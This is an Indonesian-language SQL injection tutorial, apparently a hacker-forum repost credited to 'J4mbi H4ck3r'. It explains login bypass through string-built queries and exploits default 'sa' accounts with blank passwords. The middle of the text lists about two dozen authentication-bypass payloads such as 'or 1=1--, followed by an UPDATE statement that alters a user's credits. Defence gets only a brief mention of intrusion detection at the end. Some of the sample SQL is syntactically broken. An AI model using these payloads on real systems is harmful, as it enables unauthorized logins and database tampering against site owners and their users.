Sudah disinggung diatas bahwa SQL Injection attack memanfaatkan kelemahan dalam bahasa pemprograman scripting pada SQL maksudnya adalah memanfaatkan teknik string building untuk mengeksekusi/menjalankan kode SQL. Jadi prinsip dasar SQL Injection sebenarnya memanfaatkan kode insecure (tidak aman) atas sebuah sistem yg terhubung ke internet dalam upaya melangkahi command (perintah) dan secara langsung menuju ke database untuk kemudian mengambil keuntungan dari sistem yg dijamin aman untuk melakukan pengambilan atau pengubahan atau lain sebagainya oleh penyerang.

Keuntungan yg diambil adalah seperti login akses terhadap server yg bukan haknya atau yg lainnya, tergantung kepada penyerangnya.

Input Query String

Default setting dari SQL menggunakan :

adminID = sa

password ='' (kosong atau blank)

misalnya : http://www.target.com/login.asp?adminID=sa%20password='' %20 artinya menggantikan "jarak spasi"

Ini merupakan kondisi yg berbahaya jika pengubahan setting tidak segera dilakukan.

Verifikasi yg dilakukan oleh SQL disaat pemakai memasukkan username dan password adalah seperti yg terlihat pada teks sebagai berikut :

SQLQuery="SELECT Username FROM Users WHERE Username="' strUsername&"'strpassword&"'

Pada verifikasi terdapat kelemahan pada pemprosesan pada string2 tertentu yg sebenarnya string tersebut dapat dikatakan sebagai input ilegal. Verifikasi tetap melakukan proses dan nantinya menghasilkan error page. Error page tersebut justru membuka rahasia struktur database dan bahkan error page tetapi eksekusi terhadap validasi input tetap dijalankan.

Contoh : menggunakan injection string 'OR''= pada username maupun password baik dilakukan dgn metode URL input query string maupun Box input query string maka SQL query akan membacanya sebagai berikut :

SELECT Username FROM Users WHERE Username=''OR''='' AND Password=''OR''=''

Maka yg terjadi adalah SQL query akan menyatakan blank username dan blank password sebagai user yg sah (valid). SQL Injection yg berhasil dilakukan akan ditandai dgn munculnya error page dgn error yg dimunculkan dapat berupa ODBC error, internal server error, syntax error dan lain sebagainya.

Ada banyak variasi dari injection string yg dapat digunakan untuk melakukan SQL Injection :

'or 1=1--
'or 0=0 --
'or 'x'='x
'or a=a-
"or 0=0 --
"or 0=0 #
"or "x"="x
")or("a"="a
admin'--
hi" or 1=1 --
hi' or'a'='a
hi")or("a"="a
or 0=0 #
'or a=a--
'or 0=0 #
'having 1=1--
"or 1=1--
"or "a"="a
')or('a'='a
')or('x'='x
hi" or "a"="a
hi' or 1=1 --
hi')or('a'='a
or 0=0 --
or 1=1--

Serangan dgn menggunakan SQL Injection dapat lebih bervariasi lagi dan itu tergantung kepada situasi dan tujuan dari serangan yg dilakukan oleh penyerang. Contoh :

'UPDATE YEPCell_memberDB set Credits=100 wher UserID='yamakasi'

SQl Injection yg dilakukan seseorg dapat dideteksi dgn menggunakan IDS (Intrusion Detection System). IDS bukan lagi tool yg terlalu asing terdengar ditelinga anda. Anda dapat mencarinya di www.google.com. kutipan dari J4mbi H4ck3r

Klik disini untuk melanjutkan »»